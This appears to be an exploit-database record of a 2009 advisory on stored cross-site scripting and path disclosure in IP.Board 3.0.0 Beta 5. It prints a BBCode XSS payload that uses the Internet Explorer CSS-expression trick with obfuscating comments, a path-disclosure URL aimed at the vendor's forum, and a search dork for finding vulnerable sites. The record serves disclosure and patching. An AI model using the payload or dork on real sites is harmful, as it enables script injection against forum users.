header-logo
Suggest Exploit
vendor:
IP.Board
by:
milw0rm.com
8,8
CVSS
HIGH
Cross-site Scripting (XSS) and Path Disclosure
79, 200
CWE
Product Name: IP.Board
Affected Version From: 3.0.0 Beta 5
Affected Version To: 3.0.0 Beta 5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer 6,7,8 and Firefox 2.0
2009

Active XSS in message body or signature and Path disclosure in IP.Board 3.0.0 Beta 5

A vulnerability in IP.Board 3.0.0 Beta 5 allows an attacker to inject malicious JavaScript code into the message body or signature of a user. This code will be executed in the context of the user's browser when the message is viewed. Additionally, a path disclosure vulnerability exists in the same version of IP.Board, which allows an attacker to view the full path of the application on the server.

Mitigation:

Upgrade to the latest version of IP.Board
Source

Exploit-DB raw data:

================================================================================

Found : brain[pillow]
Dork  : "Powered By IP.Board 3.0.0 Beta 5"
Visit : brainpillow.cc, forum.antichat.ru, raz0r.name
Greetz: slider, halkfild, m0nzt3r, c411k, ettee
Mail  : brainpillow@gmail.com
Note: works on IE 6,7,8. maybe all betas are vulnerable and it is possible to tune the xss for FF 2.0 too  ;) 

================================================================================

        Active XSS in message body or signature:

[email]qwe@[twitter]dodo style=`top:expr/*
        */ession/*bypassed*/(alert(/yahoo/))`do[/twitter]qwe.com[/email]

================================================================================

        Path disclosure:

http://forums.invisionpower.com/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]=

================================================================================

# milw0rm.com [2009-04-27]

Navigation

Suggest Exploit

Services By CQR